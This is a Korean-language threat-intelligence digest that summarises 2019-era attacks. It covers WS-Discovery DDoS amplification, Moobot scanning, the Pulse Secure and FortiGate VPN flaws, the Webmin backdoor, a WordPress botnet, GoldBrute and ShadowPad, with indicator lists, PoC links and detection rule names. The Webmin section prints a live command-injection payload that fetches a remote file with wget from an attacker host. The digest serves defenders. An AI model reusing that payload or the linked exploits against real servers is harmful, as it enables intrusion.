해외 보안 트렌드

요약

*WS-Discovery(Web Service Dynamic Discovery) 프로토콜 : 로컬 네트워크에서 서비스를 찾기 위해 멀티 캐스트 검색 프로토콜을 정의하는 기술 사양으로

 동일한 네트워크상의 장치 간에 통신을 가능케 하며, 모든 장치가 하나의 목적지로 ping을 전송하여 자신에 대한 세부정보를 제공할 수 있음.

  WS-Discovery는 내부 네트워크에서만 사용하기위한 목적이었으나, 인터넷에 노출된 최대 80만개의 장치가 WS-Discovery 명령을 수신할 수 있는 것으로

  추정 됨.  (→ 이는 일종의 롤 호출 요청인 ""Probes""를 전송하여 공격대상에서 데이터를 생성하고 지시할 수 있음)

*Probes: LAN에 연결된 장치를 연동하고, 설정하는데 사용 됨. Ex) 윈도우 기기가 네트워크에 연결된 프린터를 자동으로 찾고, 설정을 하는데 사용되고 있음.

- Akamai DDoS 대응팀 프롤렉식(Prolexic) 연구원들에 의해 게임 관련 산업 고객 한 명에게 초당 35Gigabit의 공격이 8월 말 탐지되었다고 공개.

  (Akamai가 경험한 DDoS 공격 중 4번째로 큰 공격임. 가장 큰 공격 크기 : 1Terabit/s)

- 공격자는 특수하게 조작된 악성 프로토콜 요청을 CCTV 카메라나 DVR과 같은 취약한 전송 장치에 전송하여 WS-Discovery를 조작할 수 있음.

- 5000개의 IP가 공격에 사용됨.

- 공격 특징

① High-Volume 공격이 가능하며 실제 바이트 크기의 15,300%에 달하는 DDoS 증폭 공격이 가능함.

    29바이트의 악성페이로드를 보내, WS-Discovery장비에 XML 에러 Response를 트리거 시킬 수 있음.

    (18바이트 페이로드로도 공격 가능. 18바이트 페이로드는 기본 Probe의 절반에 미치는 못하는 크기이며(43%), 

     허용되는 최소 probe 보다도 작은 크기임)

② WS-Discovery 기술이 다양한 장비에서 사용되고 있어 악용 시, 피해가 규모가 클 것으로 예상

    2008년부터 생산된 모든 HP 프린터, Vista 후속 버전의 모든 Windows 운영체제, IoT 장비를 포함 약 63만개의 장비들이 

    WS-Discovery 기술을 사용 중.

※현재 온라인에 노출된 WS-Discovery 관련 장비 수 : 671,633 한국 : 51,601>

 ③ UDP 프로토콜을 이용하므로 공격자는 IP주소를 스푸핑할 수 있어, 목표 대상에 Response를 보내도록 해 DDoS 공격 실시.

 ④ 기존에 사용되지 않았던 비교적 새로운 기술인 WS-Discovery 프로토콜을 이용.

- 과거 미라이 봇넷의 IoT 장비 공격 때처럼, 노출된 WS-Discovery 장비들이 공격에 사용될 시 큰 피해가 우려됨으로 관련 취약점에 대한 대비가 필요함.

- 관련 포트(3702)에 대한 스캔이 8월 중순부터 증가함 

 - 대응 방안 :  방화벽에서 UDP source port 3702를 사전차단하여 예방할 수 있으나, WS-Discovery를 사용하는 장치에 대해

                   ACL을 적용하는 것이 서비스 측면에서 효과적임.

영향성

방화벽에서 3702 포트에 대한 접근 제한이 없을 시, 공격에 취약할 수 있음

참고자료

출처 : https://www.wired.com/story/ddos-attack-ws-discovery

https://www.csoonline.com/article/3439442/misconfigured-ws-discovery-in-devices-enable-massive-ddos-amplification.html

https://zero.bs/new-ddos-attack-vector-via-ws-discoverysoapoverudp-port-3702.html

https://threatpost.com/massive-gaming-ddos-attack-widespread-technology/148443/

요약

- GreyNoise는 8월30일 전후 전체 미라이 감염 중 7%에 달하는 IP들이 NETsurveillance Acitve X 플러그인을 사용하는

        DVR/IP 카메라를 대상으로 한 대 단위 스캔 포착.

- 해당 IP는 TCP 34567 포트를 스캔하며, 8월28일 변종 미라이 컨트롤러에 추가된 기능과 연관이 있을 것으로 추정

- 보안 전문가 Masafumi Negishi 는 이를 Moobot 스캔이라 판정

* 34567 포트 : 외부에서 공유기에 접속 시 사용하는 포트포워딩 디폴트 포드로도 사용되고 있음.

※ Moobot 로더에 Moobot  C2 서버 : 80.82.65.213 (네덜란드)

   https://twitter.com/bad_packets/status/1167336978041303040

<Sans 포트 공격 트랜드 > 

 https://isc.sans.edu/port.html?port=34567

<360 NetLab> 

 https://scan.netlab.360.com/#/dashboard?tsbeg=1564848000000&tsend=1567440000000&dstport=34567&toplistname=srcip&topn=10

<GreyNoise Anomaly 탐지 - 34567 포트 스캔> 

8/29 월 평균 기준 대비 518% 증가                                                  

8/30 월 평균 기준 대비 793% 증가                                                  

9/1  월 평균 기준 대비 776% 증가

참고자료

출처 : https://twitter.com/GreyNoiseIO/status/1167582968241696772

  https://twitter.com/MasafumiNegishi/status/1167074841586913280

  https://twitter.com/bad_packets/status/1167336978041303040

  https://isc.sans.edu/port.html?port=34567

  https://scan.netlab.360.com/#/dashboard?tsbeg=1564848000000&tsend=1567440000000&dstport=34567&toplistname=srcip&topn=10

  https://twitter.com/bad_packets/status/1167336978041303040

요약

※ 2019년 7월 31일 KISA 업데이트 보안 권고 발표 

- 2019년 블랙햇에서 발표된 Pulse Secure VPN(CVE-2019-11510)과 Fortinet 사의 FortiGate VPN(CVE-2018-13379) 

        취약점을 이용한 공격이 이루어지고 있음.

* 취약점 관련 발표 자료 제목 : "Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs"

(PDF로 보기: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf)

- 공격 패턴 : 취약 시스템을 스캔 → Pulse Secure VPN의 시스템 패스워드와, FortiGate VPN의 VPN 세션 파일을 탈취 

                           → 성공 시 공격자는 장비의 인증을 통과하거나 실제 VPN 세션으로 위장할 수 있음.

- 취약점 스캔 IP : 2.137.127.2, 81.40.150.167, 185.25.51.58 

- 공식 대응법 : 취약 버전 업데이트 

(참고 : https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35101)

관련 CVE정보

- CVE-2019-11510

- CVSS Base Score : 8.8

- 현재 공격에 사용되고 있는 PoC : https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/

- PoC : https://github.com/imjdl/CVE-2019-11510-poc/blob/master/poc.py

https://github.com/projectzeroindia/CVE-2019-11510?fbclid=IwAR1ItHo1CPawodILvooxs_u3U9tc8WqiOYr1DFFrPRSvWGaOpAYxuGg6b4s

https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure

참고자료

출처 : https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/

   https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44101/s

   https://www.zdnet.com/article/hackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns/

요약

*Webmin : 원격 유닉스 기반 시스템 관리 웹 어플리케이션

- 8/20 일경 Webmin 주요 원격코드 취약점/백도어 취약점(CVE-2019-15107) 가 공개 된 다음날부터(8/21) 공격 시작

- 취약점 : SourceForge에서 제공했던 Webmin 패지키에 악성코드가 삽입되어 있어, 

                   취약 버전을 해당 사이트에서 다운받을 시 Webmin이 설치 된 모든 Linux, FreeBSD, OpenBSD 서버에 접근 가능.

- 영향받는 제품 : SourceForge에서 다운로드한 

Webmin 1.882 ~ 1.921 버전

*Webmin 1.890 버전 : 초기 설정 유지 시 즉각적인 업데이트 필요

- 선행 조건 : 1.890 이 외 버전의 경우 만료된 비밀번호 바꾸기가 enable 되어 있는 경우에만 취약

- 취약점 스캔 IP : 89.248.171.57

- 공격 IP : hxxps://pastebin.com/Piqerntf  문서 참고

   페이로드 : 

   POST /password_change.cgi HTTP/1.1  "user=roots&pam=&expired=2|wget http://128.199.251.119/webmin.php;etc&old=foo&new2=bar"

   목표 포트 : 10000

         공격 IP 

107.152.33.18

91.33.88.112

144.140.214.82

190.94.144.2

54.39.123.246

190.94.148.209

74.198.243.135

191.100.8.141

162.250.59.87

94.130.51.16

149.154.64.98

91.121.157.178

191.100.11.144

190.94.141.20

190.94.139.188

51.75.195.222

218.161.28.223

176.140.192.16

213.6.16.226

35.160.164.0

103.10.61.93

51.75.195.222

185.181.164.30  

40.78.3.140 

47.102.47.25

75.98.169.36

159.65.216.53

201.238.154.235

191.100.11.27

191.100.11.230

191.100.11.117

178.128.55.225

34.230.66.41

79.0.3.212

- 대표 공격 IP :  147.135.124.113 IoT Botnet CloudBot Det (8/24이후 지속적으로 국내/해외 그룹사의 10000포트로 접근 시도)

(https://twitter.com/bad_packets/status/1165120433462493186?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1165120433462493186&ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fhackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns%2F)

- 공식 대응법 : Webmin 1.930 버전으로 업데이트 

관련 CVE정보

- CVE-2019-15107

- CVSS Base Score : 9.8

- PoC : Webmin 비인가자 원격 코드 실행 

https://www.exploit-db.com/exploits/47230

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

탐지룰 존재유무

- IBM : HTTP_Webmin_PasswordChange_Exec

- Symantec : Web Attack: Webmin Remote Code Execution CVE-2019-15107

참고자료

출처 : https://sensorstechforum.com/cve-2019-15107-webmin/

   https://www.zdnet.com/article/hackers-mount-attacks-on-webmin-servers-pulse-secure-and-fortinet-vpns/

Webmin 백도어 : https://www.zdnet.com/article/backdoor-found-in-webmin-a-popular-web-based-utility-for-managing-unix-servers/

요약

- 악성코드 연구원 트위터 ID blackorbird 는 WordPress 를 이용한 다량의 공격 모의 정황을 포착하고 이를 Wpbot 그룹으로 칭함.

- 발견된 웹페이지(http[:]//formfactset.org:8082/static/backdoorGood.txt)에는 5만건의 넘는 WordPress 웹 사이트가 존재하며, 이 중 일부에서 리눅스 봇넷 백도어를 다운로드 됨을 확인.

- 관련 정보는 연구원의 GitHub 페이지 및 트위터 계정에서 확인 가능 

(1) Github : https://github.com/blackorbird/APT_REPORT/tree/master/data/wordpress

(2) Twitter : https://twitter.com/blackorbird/status/1158395875997057025

- 해킹으로 추측되는 WordPress URI 리스트 원문: hxxp://formfactset.org:8082/static/backdoorGood.txt 

- 확인된 악성코드 다운로드 URI

hxxp://mongol-kino.mn/wp-content/uploads/2019/07/IcYbJa

hxxps://indojayaprimergy.com/wp-content/plugins/apikey/3JQoFf

hxxps://free-food.000webhostapp.com/wp-content/uploads/2019/06/vULqz9

hxxps://tgm.tgmapartments.com/hack/f190Iw

hxxp://boutique.liberal.ca/wp-content/uploads/2019/06/8puk0P

hxxps://www.georgevaults.com/wp-content/uploads/2019/05/WOtgUS

hxxp://www.skoda-bohemiamotors.pl/wp-content/uploads/2019/05/bunIjd

- 봇넷 멀웨어 : 샘플은 Github 페이지에서 다운로드 가능

47d704b79364e2ab333e614c166d0b7d (https://www.virustotal.com/gui/file/0f4755f65c495d3711bf22271f85f1ee86da8b7a487e770f769af56e189be48c/detection)

db08d343049c733a97bccaf394db56a2 (https://www.virustotal.com/gui/file/a316d81976b82d3d6cee974ba4dd5333506d2c93a7f0b2e5cd8e1a75bb325a1b/relations)

- 감염경로

워드프레스 취약점을 악용한 공격으로 플러그인의 취약점을 이용한 공격으로 추정

일부 워드프레스 사용 피해자 컨택 결과, 잘 알려지지 않은 플러그인을 설치했던 것 이외에 특이사항을 발견하지 못함.

※ 감염 시, 해당 도메인(hxxp://formfactset.org)으로 정보를 전송하는 것으로 추정 (링크)

탐지룰 존재유무

- 네트웍 보안장비 탐지룰 : 현재 없음

- 백신 및 APT탐지 : FireEYE (o), AhnLab (x)

FireEYE : Trojan.Zyx.FEC3

TrendMicro : Trojan.Linux.ZYX.USELVEE19

Symantec : Trojan.Gen.2

참고자료

출처 : https://twitter.com/blackorbird/status/1158395875997057025

         https://github.com/blackorbird/APT_REPORT/tree/master/data/wordpress

요약

- GoldBrute 별칭의 취약하거나 재사용 하는 패스워드를 이용한 RDP 서버 무차별 대입 공격 성행 중.

- 공격 내용 : 단일 C&C[104.156.249.231]를 이용해 인터넷에 노출된 150만의 RDP 서버에 대해 무차별 대입 공격 중.

  (전체 노출 RDP 서버 중 약 62.5%에 달하는 서버를 공격 중. Shondan 검색 결과, 현재 인터넷에 노출된 RDP 서버의 수는 240만대)

- 공격 코드를 이용한 시뮬레이션 결과, 6시간 동안 1,596,571 유니크한 IP를 포함한 210만개의 IP가 C2 서버로 전송 되는 것을 확인

   (해당 IP들에 대한 무차별 대입 공격은 실시하지 않음)

   [시뮬레이션 결과: 취약 IP 지역별 분포]  출처 참고

관련 CVE정보

요약

- 2017년 넷사랑 서버 관리 소프트웨어 패키지에 백도어를 삽입해 배포한 공격.

   (넷사랑 : 은행, 미디어 회사, 에너지 회사, 제약 회사, 통신 사업자, 운송, 물류 등 다양한 분야의 회사가 사용 중)

- 최초 탐지 : 최초 탐지까지 최소 17일 소요.

- 악성 코드 정보 

(1)  특징 : 넷사랑이 판매하는 정상 암호 인증서로 정상 서비스로 위장.

(2)  공격 유형 : 서플라이 체인 공격

(3) 공격 방법 : 넷사랑의 업데이트 매커니즘을 하이재킹해 소프트웨어 업데이트에 백도어 삽입. 

                   공격자는 모든 넷사랑 클라이언트에 악성 코드 배포.

(4) 악성 코드 : Xmanager, Xshell 소프트웨어 패키지의 nssock2.dll 라이브러리에 백도어 삽입. 

                   백도어 코드는 8시간 마다 C&C서버에 도메인 이름, 네트워크 정보, 사용자 이름 등의 감염 컴퓨터 정보를 전송

(5) 백도어 실행 방법 : 특정 도메인에 대한 DNS TXT 기록을 이용해 백도어 실행

º 도메인 이름은 현 년도, 월을 기준으로 작성되었으며 DNS 룩업 기능을 수행

º TXT 기록이 작동 시, C&C DNS 서버는 디크립션 키를 전송

º 백도어 실행 시, ShadowPad 백도어는 프로세스를 실행하고 임의의 코드를 다운로드하고 실행할 수 있는 풀 백도어를 가짐. 

   가상 파일 시스템(vitual file system, VFS)를 레지스트리에 보유.

(6) 백도어 탐지 방법 : 아래 도메인에 DNS 요청을 보낸 이력이 있는지 확인 

º ribotqtonut[.]com

º nylalobghyhirgh[.]com

º jkvmdmjyfcvkf[.]com

º bafyvoruzgjitwr[.]com

º xmponmzmxkxkh[.]com

º tczafklirkl[.]com

º notped[.]com

º dnsgogle[.]com

º operatingbox[.]com

º paniesx[.]com

º techniciantext[.]com

- 영향 받는 제품 : 

º Xmanager Enterprise 5.0 Build 1232

º Xmanager 5.0 Build 1045

º Xshell 5.0 Build 1322

º Xftp 5.0 Build 1218

º Xlpd 5.0 Build 1220

- 2017년 8월 4일, 넷사랑은 악성 소프트웨어를 제거하기 위한 업데이트를 배포

탐지룰 존재유무

- IBM 

취약점명: Trojan.Windows.ShadowPad

탐지룰 : ShadowPad_Request_CnC

탐지장비 : IBM Security Network Protection, Proventia Network IPS

- TrendMicro : 

탐지명 : 2308 - Possible DGA – DNS (Response), 1008571, DNS Request To ShadowPad Domain Detection, 29425

TippinPoint 탐지명 : DNS: ShadowPad Checkin

참고자료

Kaspersky 분석 : https://securelist.com/shadowpad-in-corporate-networks/81432/

출처 : https://thehackernews.com/2017/08/netsarang-server-management.html

   https://www.boannews.com/media/view.asp?idx=56381&kind=1&search=title&find=%B3%DD%BB%E7%B6%FB

요약

- 파키스탄 여권 정보 확인 사이트(tracking.dgip.gov[.]pk, 파키스탄 이민국의 서브 도메인)에 스캔박스 정찰 프레임워크가 삽입되어, 홈페이지 방문자들을 공격.

- 공격 툴 : 스캔박스 정찰 프레임워크

*지난 주 동일한 툴을 이용해 카이로 방글라데시 대사관이 공격을 받은 바 있음

- 최초 감염 시기: 2019년 3월 2일

- 감염 경로 : Trustwave의 분석에 따르면 스캔박스 자바스크립트 코드가 원격으로 설치가 됨.

- 피해 현황 : 스캔박스를 이용해 웹사이트 방문객의 모든 장치 정보와 방문 당시 사용 키 입력값(keystroke), 77개의 소프트웨어 및 장비 설치 유무를 스캔(보안 프로그램, 가상화, 압축파일 등)

- 스캔박스 정찰 프레임워크(Scanbox Framework)

º 최초 등장 : 2014년

º 사용 그룹 : APT그룹이 주로 사용

º 사용 이력 :  2017년 Stone Panda, 2018년 LuckyMouse 그룹이 사용

º 악용 방법 : 워터링 홀(Watering Hole)공격에 주로 사용 

*워터링 홀 공격 : 방문할 가능성이 높거나 주로 사용되는 웹사이트를 감염시킨 후 잠복하면서 

                       피해자 컴퓨터에 악성 코드를 추가로 설치하는 공격. 

º 공격 시나리오 : 스캔박스 정찰 프레임워크에 감염된 웹사이트에 접근 시 방문객의 IP주소, 디바이스 운영체제, 플러그인, 유저 에이전트 

                       등의 정보를 획득. 획득한 정보를 이용해 구성도 높은 공격 실시. 

- 영향성 : 메이저 보안 장비에서 스캔박스 감염 사실이 탐지가 되지 않음. 현재 해당 사이트가 언제 스캔박스에 감염되었는지 확인되지 않았으나 

              70개의 사이트의 방문자 정보와 방문자 1/3의 로그인 정보가 스캔박스를 통해 탈취된 것을 확인.

- 대응 여부 : 감염 여부를 관리자에게 통지했으나, 아무런 조치가 취해지지 않음. 사이트는 현재 감염 상태. 

- 파키스탄 대상 공격 : 최근 파키스탄 유명 자동차관련 회사 PakWheel(중고/신차 및 자동차 부품 판매)이 공격을 당해 70만명의 계정 정보가 

                              탈취 됨. (https://www.pakwheels.com)

참고자료

Trustwave 분석 : https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/

출처 : https://www.hackread.com/pakistani-govts-passport-application-tracking-site-hacked-scanbox-framework/